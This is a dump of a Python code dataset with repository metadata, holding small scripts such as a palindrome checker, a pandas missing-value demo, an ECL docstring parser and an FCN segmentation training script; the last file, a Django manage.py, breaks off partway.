Dataset schema (column name, type, and value range or number of classes):

| column | type | range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M (nullable) |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 (nullable) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 (nullable) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | list | length 1 |
| author_id | string | length 1 to 132 |
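The rows that follow use this schema, one record per source file. As a minimal sketch of how such a dataset could be iterated with the Hugging Face `datasets` library (the dataset name `org/python-code-dump` is a hypothetical placeholder, not given by this dump):

```python
from datasets import load_dataset

# Hypothetical dataset name; substitute the actual Hub path for this dump.
ds = load_dataset("org/python-code-dump", split="train", streaming=True)

for row in ds:
    # Each record pairs repository metadata with the raw file contents.
    if row["language"] == "Python" and not row["is_generated"]:
        print(row["repo_name"], row["path"], row["length_bytes"])
        source = row["content"]  # the file text shown in the rows below
        break
```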
2fc54fdb33564c85093d3c1ade8519f47bef85fa
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02553/s438652342.py
|
82c198767ca5b7f4168c3c85266ada4096dd8b62
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 88 |
py
|
a, b, c, d = [int(e) for e in input().split(" ")]
print(max((a*c), (a*d), (b*c), (b*d)))
|
[
"[email protected]"
] | |
5cdc3d8fc2d6064c8aed7bcf1fc396041a3ef2a1
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/StudentProblem/10.21.11.2/1/1569578564.py
|
a178fed62c1e5d05670590176c94822f3406337d
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,645 |
py
|
import functools
import typing
import string
import random
import pytest
## Solution part 1.
def nwords(s: str) -> int:
    """Computes the number of words in the string argument s.
    args: s, a string
    returns: the word count (int)
    """
    # str.split() with no arguments collapses runs of whitespace, which avoids
    # the original off-by-one bug when several whitespace characters occur in a row.
    return len(s.split())
## Solution part 2.
def word_count_iter(it) -> tuple:
    """Takes an iterable argument that yields one line (a string) per iteration.
    Returns a tuple of the number of lines, the number of words and the number
    of characters read from the argument.
    Args: it, an iterable object
    Returns: t, a tuple (lines, words, characters)
    """
    lines = words = chars = 0
    for line in it:
        lines += 1
        words += nwords(line)
        chars += len(line)
    return (lines, words, chars)
######################################################################
## Solution part 3. (Tests)
def test_word_count_iter():
    assert word_count_iter(["abc abc"]) == (1, 2, 7)
    assert word_count_iter([]) == (0, 0, 0)
    assert word_count_iter(["abc", "abc"]) == (2, 2, 6)
## revert
try:
    word_count_iter = word_count_iter.__wrapped__
except AttributeError:
    pass
## Solution part 4.
def word_count(f: str) -> tuple:
    """Takes a filename f as argument and returns a tuple of the number of lines,
    the number of words and the number of characters read from the corresponding file.
    Args: f, a filename
    Returns: tuple (lines, words, characters)
    """
    with open(f) as handle:
        return word_count_iter(handle)
######################################################################
|
[
"[email protected]"
] | |
3f038c912cdab138dfec0d40cf9f50af36ae68e9
|
e98f3960d0465c91ec1e39272a49ce5ce4496708
|
/src/ecldoc/parseDoc.py
|
b422e00207890399779faefac982fe2ebc84ceb4
|
[] |
no_license
|
successar/ecldoc
|
7336c26291e68663e4bc739ab891f521724245cf
|
c7c7458c1bafb2bf9563a082fc05da5f64ef0a2e
|
refs/heads/master
| 2021-01-14T08:22:04.824906 | 2017-08-12T12:02:19 | 2017-08-12T12:02:19 | 81,946,670 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,712 |
py
|
import re
from lxml import etree
import lxml.html as H
from collections import defaultdict
def parseDocstring(docstring) :
'''
Parse Docstring as returned by eclcc,
break into individual tags and
return them as XML Elements
'''
docstring = re.sub(r'\n\s*\*', '\n', docstring)
docstring = re.sub(r'\r', ' ', docstring)
docstring = docstring.strip().split('\n')
docdict = defaultdict(list)
current_tag = 'content'
current_text = ''
for line in docstring :
is_tag = re.search(r'^\s*@', line)
if is_tag :
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
line = re.split(r'\s', line.lstrip(), maxsplit=1)
tag = line[0][1:]
text = line[1]
current_tag = tag
current_text = text + '\n'
else :
current_text += line + '\n'
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
for tag in docdict :
for i, desc in enumerate(docdict[tag]) :
root = H.fragment_fromstring(desc, create_parent='div')
removeWS(root)
content = etree.Element(tag)
content.text = etree.tostring(root)
content.text = re.sub(r'^<div>', '', content.text)
content.text = re.sub(r'</div>$', '', content.text)
docdict[tag][i] = content
return docdict
def removeWS(element) :
'''
Format Whitespace in HTML elements in docstring
coming from parsed XML Output of ECL File
'''
if element.tag == 'pre' :
lines = element.text.split('\n')
element.text = lines[0]
for line in lines[1:] :
br = etree.Element('br')
br.tail = line
element.append(br)
return
if element.text is not None :
element.text = re.sub(r'\s+', ' ', element.text)
for e in element.iterchildren() :
if e.tail :
e.tail = re.sub(r'\s+', ' ', e.tail)
removeWS(e)
def findFirstLine(current_text) :
'''
Find First line in docstring content section to be used as caption
in TOC and Tree
'''
split_1 = re.split(r'\.\s|\.$', current_text.strip(), maxsplit=1)
if len(split_1) == 2 :
return split_1[0].strip()
split_2 = re.split(r'\n', current_text.strip(), maxsplit=1)
return split_2[0].strip()
##########################################################
def construct_type(ele) :
'''
Parse Type Tree into single string representation
'''
if ele is None : return ''
if type(ele) == list : return ''
typestring = ''
attribs = ele.attrib
typename = attribs['type']
if typename == 'record' :
if 'unnamed' in attribs :
typestring += '{ '
fields = []
for field in ele.findall('Field') :
fields.append(construct_type(field.find('./Type')) + " " + field.attrib['name'])
typestring += ' , '.join(fields) + ' }'
else :
typestring += attribs['origfn'] if 'origfn' in attribs else attribs['name']
else :
typestring += typename.upper()
if 'origfn' in attribs :
typestring += ' ( ' + attribs['origfn'] + ' )'
elif 'name' in attribs :
typestring += ' ( ' + attribs['name'] + ' )'
if typename == 'function' :
typestring += ' [ '
params = []
for p in ele.find('Params').findall('Type') :
params.append(construct_type(p))
typestring += ' , '.join(params) + ' ]'
if ele.find('./Type') is not None :
typestring += ' ( ' + construct_type(ele.find('./Type')) + ' )'
return typestring
##########################################################
def cleansign(text) :
'''
Remove irrelevant prefix and suffixes from signature
'''
text = re.sub(r'^export', '', text, flags=re.I)
text = re.sub(r'^shared', '', text, flags=re.I)
text = re.sub(r':=$', '', text, flags=re.I)
text = re.sub(r';$', '', text, flags=re.I)
text = re.sub(r'\s+', ' ', text.strip())
return text
def breaksign(name, text) :
'''
Heuristically break signature of ECL Definition
recovered from ecl file into "return name (Paramters)"
'''
name = name.lower()
string = ' ' + text.lower() + ' '
pos = 1
open_bracks = ['{', '(', '[']
close_bracks = ['}', ')', ']']
stack = []
ret, param = '', ''
indent_len = 0
name_len = len(name)
for i in range(1, len(string)) :
c = string[i]
if c in open_bracks :
stack.append(c)
elif c in close_bracks :
if stack[-1] == open_bracks[close_bracks.index(c)] :
stack = stack[:-1]
else :
if len(stack) == 0 :
m = re.match(r'[\s\)]' + name + r'([^0-9A-Za-z_])', string[pos-1:])
if m :
pos = pos - 1
ret = text[:pos]
param = text[pos + name_len:]
indent_len = pos + name_len
break
pos += 1
return ret.strip(), param.strip(), indent_len
##########################################################
def getTags(doc) :
'''
Convert XML Documentation (generated using parseDocstring)
back to JSON (ie Python Dictionary)
'''
tag_dict = defaultdict(list)
if doc is None : return tag_dict
for child in doc.getchildren() :
tag_dict[child.tag].append(child.text)
return tag_dict
|
[
"[email protected]"
] | |
de2e4a9bf1208d0184327f19cfd432928ffbfdde
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/dcFp6EuCm8J2HNKFG_21.py
|
75a6a5b07dd4596969ad89d81d4ceb4d5cc5bf5a
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
def func(lst):
global res
res = 0
fun(lst)
return res
def fun(lst):
global res
if isinstance(lst,list):
res += len(lst)
for l in lst:
fun(l)
|
[
"[email protected]"
] | |
0c9ef5dcdc3f510c6972175e849cf43b3caee43c
|
651a296c8f45b5799781fd78a6b5329effe702a0
|
/c8lib/c8vec_uniform_01.py
|
f77127fe01f76857c299aa377e44b3252af5e4c8
|
[] |
no_license
|
pdhhiep/Computation_using_Python
|
095d14370fe1a01a192d7e44fcc81a52655f652b
|
407ed29fddc267950e9860b8bbd1e038f0387c97
|
refs/heads/master
| 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,367 |
py
|
#!/usr/bin/env python
def c8vec_uniform_01 ( n, seed ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01 returns a unit pseudorandom C8VEC.
#
# Discussion:
#
# The angles should be uniformly distributed between 0 and 2 * PI,
# the square roots of the radius uniformly distributed between 0 and 1.
#
# This results in a uniform distribution of values in the unit circle.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Paul Bratley, Bennett Fox, Linus Schrage,
# A Guide to Simulation,
# Second Edition,
# Springer, 1987,
# ISBN: 0387964673,
# LC: QA76.9.C65.B73.
#
# Bennett Fox,
# Algorithm 647:
# Implementation and Relative Efficiency of Quasirandom
# Sequence Generators,
# ACM Transactions on Mathematical Software,
# Volume 12, Number 4, December 1986, pages 362-376.
#
# Pierre L'Ecuyer,
# Random Number Generation,
# in Handbook of Simulation,
# edited by Jerry Banks,
# Wiley, 1998,
# ISBN: 0471134031,
# LC: T57.62.H37.
#
# Peter Lewis, Allen Goodman, James Miller,
# A Pseudo-Random Number Generator for the System/360,
# IBM Systems Journal,
# Volume 8, Number 2, 1969, pages 136-143.
#
# Parameters:
#
# Input, integer N, the number of values to compute.
#
# Input, integer SEED, a seed for the random number generator.
#
# Output, complex C(N), the pseudorandom complex vector.
#
# Output, integer SEED, a seed for the random number generator.
#
import numpy
from math import cos, floor, pi, sin, sqrt
from sys import exit
i4_huge = 2147483647
seed = floor ( seed )
if ( seed < 0 ):
seed = seed + i4_huge
if ( seed == 0 ):
print ''
print 'C8VEC_UNIFORM_01 - Fatal error!'
print ' Input SEED = 0!'
exit ( 'C8VEC_UNIFORM_01 - Fatal error!' )
c = numpy.zeros ( n, 'complex' )
for j in range ( 0, n ):
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
r = sqrt ( seed * 4.656612875E-10 )
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
theta = 2.0 * pi * seed * 4.656612875E-10
c[j] = r * complex ( cos ( theta ), sin ( theta ) )
return c, seed
def c8vec_uniform_01_test ( ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01_TEST tests C8VEC_UNIFORM_01.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
seed = 123456789
print ''
print 'C8VEC_UNIFORM_01_TEST'
print ' C8VEC_UNIFORM_01 computes pseudorandom complex values'
print ' in the unit circle.'
print ''
print ' The initial seed is %d' % ( seed )
print ''
n = 10
[ x, seed ] = c8vec_uniform_01 ( n, seed )
for i in range ( 0, n ):
print ' %6d ( %f, %f )' % ( i, x[i].real, x[i].imag )
print ''
print 'C8VEC_UNIFORM_01_TEST:'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
c8vec_uniform_01_test ( )
timestamp ( )
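The Discussion block above describes the standard trick for sampling uniformly in the unit disc: a uniform angle combined with the square root of a uniform radius. As a separate, modern NumPy sketch of the same idea (it does not reproduce the portable LCG stream used by c8vec_uniform_01):

```python
import numpy as np

rng = np.random.default_rng(123456789)
n = 10
r = np.sqrt(rng.random(n))             # sqrt of a uniform radius in [0, 1)
theta = 2.0 * np.pi * rng.random(n)    # uniform angle in [0, 2*pi)
c = r * (np.cos(theta) + 1j * np.sin(theta))  # uniform points in the unit disc
print(c)
```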
|
[
"[email protected]"
] | |
a4109108ce79ce8ffa413a457964c2fc31fa84dd
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/6NoaFGKJgRW6oXhLC_20.py
|
b805a8bd5efdd4230470dd426cbebc9d41b4ae6f
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 270 |
py
|
def sum_of_vowels(txt):
count = 0
txt = txt.upper()
for x in txt:
if x == "A":
count += 4
elif x == "E":
count += 3
elif x == "I":
count += 1
else:
count += 0
return count
|
[
"[email protected]"
] | |
c890c2a824190f02edfa382c7de2388243c80273
|
d99e73252210d9ab5dea0b46d2f82f8a036373ce
|
/scripts/rawFoldTime.py
|
ee6e0616d95093414fa34bdc91064d3e9dc32732
|
[] |
no_license
|
schwancr/schwancr_bin
|
710378ebca8482b1e4e38be894a22349e808e18a
|
fb42d40ac7be4b9984c257c09b569d740926781a
|
refs/heads/master
| 2016-08-04T23:36:29.658194 | 2015-06-30T18:26:04 | 2015-06-30T18:26:04 | 7,841,529 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,813 |
py
|
#!/usr/bin/env python
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-p',dest='proj_FN',default='../ProjectInfo.h5',help='ProjectInfo.h5 from msmbuilder [ ../ProjectInfo.h5 ]')
parser.add_option('-d',dest='data_FN',help='Data to use as a metric for folded and unfolded states' )
parser.add_option('--fc', dest='f_cut',type=float,help='Folded cutoff')
parser.add_option('--uc',dest='u_cut',type=float,help='Unfolded cutoff')
parser.add_option('--low-is-folded',dest='low_is_folded',default=False,action='store_true',help='Pass this flag if a small number means the conformation is folded (i.e. RMSD)')
parser.add_option('-o',dest='out_FN',default='Fold_Unfold_Times.pdf',help='Output file to write to')
options, args = parser.parse_args()
from numpy import *
from msmbuilder import Project
from pyschwancr import dataIO, msmTools
import os, sys, re
import matplotlib
matplotlib.use('pdf')
from matplotlib.pyplot import *
from scipy import optimize
Proj = Project.Project.LoadFromHDF( options.proj_FN )
Data = dataIO.readData( options.data_FN )
# first reshape the data into trajectories.
Lens = Proj['TrajLengths']
Trajs = []
sum = 0
for i in range( len( Lens ) ):
Trajs.append( Data[ sum : sum + Lens[i] ] )
sum += Lens[i]
Folds = []
Unfolds = []
for traj in Trajs:
(a,b) = msmTools.calcRawFoldTime( traj, options.f_cut, options.u_cut, low_is_folded = options.low_is_folded )
Folds.extend( a )
Unfolds.extend( b )
#FoldsDist = bincount( Folds )
#UnfoldsDist = bincount( Unfolds )
figure()
subplot(211)
foldHist = hist( Folds, bins=100, color = 'blue', label='Fold' )
vlines( mean( Folds ), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xFolds = xlim()
subplot(212)
unfoldHist = hist( Unfolds, bins=100, color = 'red', label='Unfold' )
vlines( mean( Unfolds), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xUnfolds = xlim()
xlabel('Fold/Unfold Times (frames)')
suptitle('Distribution of Folding/Unfolding times')
subplot(211)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Folds ), len( Folds ) ) )
yLimF = ylim()
subplot(212)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Unfolds ), len( Unfolds ) ) )
yLimU = ylim()
savefig( options.out_FN )
yFold = foldHist[0]
xFold = array( [ ( foldHist[1][i+1] + foldHist[1][i] ) / 2. for i in range( len( foldHist[0] ) ) ] )
yUnfold = unfoldHist[0]
xUnfold = array( [ ( unfoldHist[1][i+1] + unfoldHist[1][i] ) / 2. for i in range( len( unfoldHist[0] ) ) ] )
expFit = lambda p, x : p[0] * exp( - p[1] * x )
powFit = lambda p, x : p[0] * x ** ( - p[1] )
errExp = lambda p, x, y : expFit( p, x ) - y
errPow = lambda p, x, y : powFit( p, x ) - y
foldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xFold, yFold ), maxfev = 1000000 )
foldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xFold, yFold ), maxfev = 1000000 )
unfoldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
unfoldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
SStot_F = ( ( yFold - yFold.mean() ) **2 ).sum()
SStot_U = ( ( yUnfold - yUnfold.mean() ) ** 2 ).sum()
SSerr_F_exp = ( ( yFold - expFit( foldExp[0], xFold ) ) ** 2 ).sum()
SSerr_F_pow = ( ( yFold - powFit( foldPow[0], xFold ) ) ** 2 ).sum()
SSerr_U_exp = ( ( yUnfold - expFit( unfoldExp[0], xUnfold ) ) ** 2 ).sum()
SSerr_U_pow = ( ( yUnfold - powFit( unfoldPow[0], xUnfold ) ) ** 2 ).sum()
R2_F_exp = 1 - SSerr_F_exp / SStot_F
R2_F_pow = 1 - SSerr_F_pow / SStot_F
R2_U_exp = 1 - SSerr_U_exp / SStot_U
R2_U_pow = 1 - SSerr_U_pow / SStot_U
figure()
xi = linspace( 1, max(xFolds[1], xUnfolds[1]), 1000 )
subplot(211)
scatter( xFold, yFold, color = 'blue', label='Fold Times' )
plot( xi, expFit( foldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( foldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimF )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_F_exp, R2_F_pow ) )
legend()
subplot(212)
scatter( xUnfold, yUnfold, color = 'red', label = 'Unfold Times' )
plot( xi, expFit( unfoldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( unfoldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimU )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_U_exp, R2_U_pow ) )
legend()
suptitle('Fits of Distribution of Folding/Unfolding Times')
xlabel('Fold/Unfold Times (frames)')
savefig( options.out_FN[:-4] + 'FITS' + options.out_FN[-4:] )
|
[
"[email protected]"
] | |
eb08eed3392c1000edd7dfa16c3c1cbf171d51e6
|
0d8ee78f61660343e5feec41a53269dbf5585fa3
|
/Demo11/fill_nan.py
|
2705a3af2c26a7166ff0fe404b2b0e9ae7b01c2b
|
[] |
no_license
|
x-jeff/Python_Code_Demo
|
41b033f089fa19d8c63b2f26bf66ef379738c4ad
|
9bc458b08cfae0092e8f11a54031ca2e7017affc
|
refs/heads/master
| 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,954 |
py
|
import pandas as pd
import numpy as np
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
# Fill missing values with the constant 2
print(df.fillna(2))
# Fill missing Age values with the column mean (first without inplace, then with inplace=True)
df["Age"].fillna(df["Age"].mean())
print(df)
df["Age"].fillna(df["Age"].mean(),inplace=True)
print(df)
np.random.seed(1)
df=pd.DataFrame({"key1":list('aabba'),"key2":["one","two","one","two","one"],"data1":np.random.randn(5),"data2":np.random.randn(5)})
print(df)
# Compute the group-wise means (per key1)
grouped=df["data1"].groupby(df["key1"])
print(grouped.mean())
# df["data1"]=df["data1"].groupby(df["key1"]).transform("mean")#方法一
df["data1"]=df.groupby("key1")["data1"].transform("mean")#方法二
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
# Fill missing ages with the mean age of each gender
# approach 1
df["Age"].fillna(df["Age"].groupby(df["Gender"]).transform("mean"),inplace=True)
print(df)
# approach 2
df["Age"].fillna(df.groupby("Gender")["Age"].transform("mean"),inplace=True)
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
# Forward-fill missing values (method="pad" carries the last valid value down)
# df.fillna(method="pad",inplace=True)
# print(df)
# Backward-fill missing values (method="bfill" uses the next valid value)
# df.fillna(method="bfill",inplace=True)
# print(df)
# When backward-filling, fill at most one row per gap (limit=1)
df.fillna(method="bfill",inplace=True,limit=1)
print(df)
df=pd.DataFrame([[1,870],[2,900],[np.nan,np.nan],[4,950],[5,1000],[6,1200]])
df.columns=["Time","Value"]
print(df)
# Fill missing values by interpolation
print(df.interpolate())
|
[
"[email protected]"
] | |
e9b3f8973d911ceb5d48ec19e663a81368493195
|
f343b2ac4f5b52abd5e6a8fb6bef55acf3a32154
|
/solutions-BEWARE-DO-NOT-ENTER/week-4/takeHomeChallenge-palindrome.py
|
e4a2ccdfe7f0be3a40c21436e6c20987ccb1f2fa
|
[] |
no_license
|
asyrul21/recode-beginner-python
|
41248d59199ac3660ef40aa3a5fdf23fadfb6b5b
|
93608e2880aec1774e898d5f1a663dc84e246b46
|
refs/heads/master
| 2023-07-04T21:59:08.135443 | 2021-08-09T01:43:30 | 2021-08-09T01:43:30 | 330,307,505 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 944 |
py
|
# The Palindrome Checker
# 1. Create a variable named word and assign it to the input() statement you learned last week
# 2. Transform this word to all lowercase by calling word.lower()
# 3. Set a flag named palindrome and set it to True
# 4. Set up a for loop with enumerate, and check that the current letter
#    equals the letter at the same position counted from the back
# 5. If this is not true, change palindrome to False and break from the loop
# 6. Finally, if palindrome is True, output something. Else, output a different message.
# (A more compact slicing-based check is sketched after this solution.)
print("Welcome to the Palindrome Checker")
print()
word1 = input("Insert a word: ")
word1 = word1.lower()
palindrome = True
for idx, letter in enumerate(word1):
if word1[idx] == word1[len(word1) - (idx + 1)]:
palindrome = True
else:
palindrome = False
break
print()
if(palindrome):
print("This is a palindrome!")
else:
print("Nope this is not.")
|
[
"[email protected]"
] | |
13a7dfa407470abb9ca3c605120da264d916ae5d
|
249c7081a766318360da21c66e7a30f917c90738
|
/exercicio 2.py
|
c4a34ba0a76bc805393dd0d3128c0d2ff7cc3088
|
[] |
no_license
|
Danlei27/PycharmProjects
|
b4d93a966b45c84f206498faa60c36f8b356c5a9
|
abedd9911d7a28f64366f4ea69de86ed16d39534
|
refs/heads/master
| 2020-05-30T10:32:55.793721 | 2019-06-01T00:33:27 | 2019-06-01T00:33:27 | 189,675,167 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 274 |
py
|
dia=input('dia')
mes=input('mes')
ano=input('ano')
cores = {'limpa':'\033[m',
'azul':'\033[34m',
'amarelo':'\033[33m',
'pretoebranco':'\033[7;30m'}
print('Você nasceu no dia' ,cores ['azul'],dia, 'do' ,mes, 'de' ,ano,cores['limpa'], '.correto?')
|
[
"[email protected]"
] | |
65235dd521308b51b04aee202f4a2e28bd864484
|
2a5d8aafddf6744b8ec5a025a1b908878a56d59d
|
/examples/voc/train_fcn16s.py
|
9c935715746c66f95eccf3a69ac092c5df8fd147
|
[] |
no_license
|
mrteera/pytorch-fcn
|
030e50657b48a4d43d02c8f0b1020ba15248b3db
|
449f92a26beb6bbd423e6fefce896ec96c944e16
|
refs/heads/master
| 2021-08-20T02:32:48.063375 | 2017-11-28T01:23:12 | 2017-11-28T01:23:12 | 112,288,341 | 2 | 0 | null | 2017-11-28T05:05:08 | 2017-11-28T05:05:08 | null |
UTF-8
|
Python
| false | false | 3,067 |
py
|
#!/usr/bin/env python
import argparse
import os
import os.path as osp
import torch
import torchfcn
from train_fcn32s import get_log_dir
from train_fcn32s import get_parameters
configurations = {
# same configuration as original work
# https://github.com/shelhamer/fcn.berkeleyvision.org
1: dict(
max_iteration=100000,
lr=1.0e-12,
momentum=0.99,
weight_decay=0.0005,
interval_validate=4000,
fcn32s_pretrained_model=torchfcn.models.FCN32s.download(),
)
}
here = osp.dirname(osp.abspath(__file__))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', type=int, required=True)
parser.add_argument('-c', '--config', type=int, default=1,
choices=configurations.keys())
parser.add_argument('--resume', help='Checkpoint path')
args = parser.parse_args()
gpu = args.gpu
cfg = configurations[args.config]
out = get_log_dir('fcn16s', args.config, cfg)
resume = args.resume
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu)
cuda = torch.cuda.is_available()
torch.manual_seed(1337)
if cuda:
torch.cuda.manual_seed(1337)
# 1. dataset
root = osp.expanduser('~/data/datasets')
kwargs = {'num_workers': 4, 'pin_memory': True} if cuda else {}
train_loader = torch.utils.data.DataLoader(
torchfcn.datasets.SBDClassSeg(root, split='train', transform=True),
batch_size=1, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
torchfcn.datasets.VOC2011ClassSeg(
root, split='seg11valid', transform=True),
batch_size=1, shuffle=False, **kwargs)
# 2. model
model = torchfcn.models.FCN16s(n_class=21)
start_epoch = 0
start_iteration = 0
if resume:
checkpoint = torch.load(resume)
model.load_state_dict(checkpoint['model_state_dict'])
start_epoch = checkpoint['epoch']
start_iteration = checkpoint['iteration']
else:
fcn32s = torchfcn.models.FCN32s()
fcn32s.load_state_dict(torch.load(cfg['fcn32s_pretrained_model']))
model.copy_params_from_fcn32s(fcn32s)
if cuda:
model = model.cuda()
# 3. optimizer
optim = torch.optim.SGD(
[
{'params': get_parameters(model, bias=False)},
{'params': get_parameters(model, bias=True),
'lr': cfg['lr'] * 2, 'weight_decay': 0},
],
lr=cfg['lr'],
momentum=cfg['momentum'],
weight_decay=cfg['weight_decay'])
if resume:
optim.load_state_dict(checkpoint['optim_state_dict'])
trainer = torchfcn.Trainer(
cuda=cuda,
model=model,
optimizer=optim,
train_loader=train_loader,
val_loader=val_loader,
out=out,
max_iter=cfg['max_iteration'],
interval_validate=cfg.get('interval_validate', len(train_loader)),
)
trainer.epoch = start_epoch
trainer.iteration = start_iteration
trainer.train()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b3fca3d8347c9eca93b76398de109317a0a9a702
|
144f5e7480d12bb617928d1f248db3c969e7469e
|
/manage.py
|
216e8b83633cd376c5b286885dac519047de9fae
|
[] |
no_license
|
eng-olavo/HelloWorldUdemy
|
0c4b66315be350c431ba4c5395a71aa5f5edf5e1
|
bf9b78e82e2ae5c2055dd72a1a6b55520896c86f
|
refs/heads/master
| 2023-07-10T09:26:43.174027 | 2021-08-25T11:44:29 | 2021-08-25T11:44:29 | 399,786,000 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
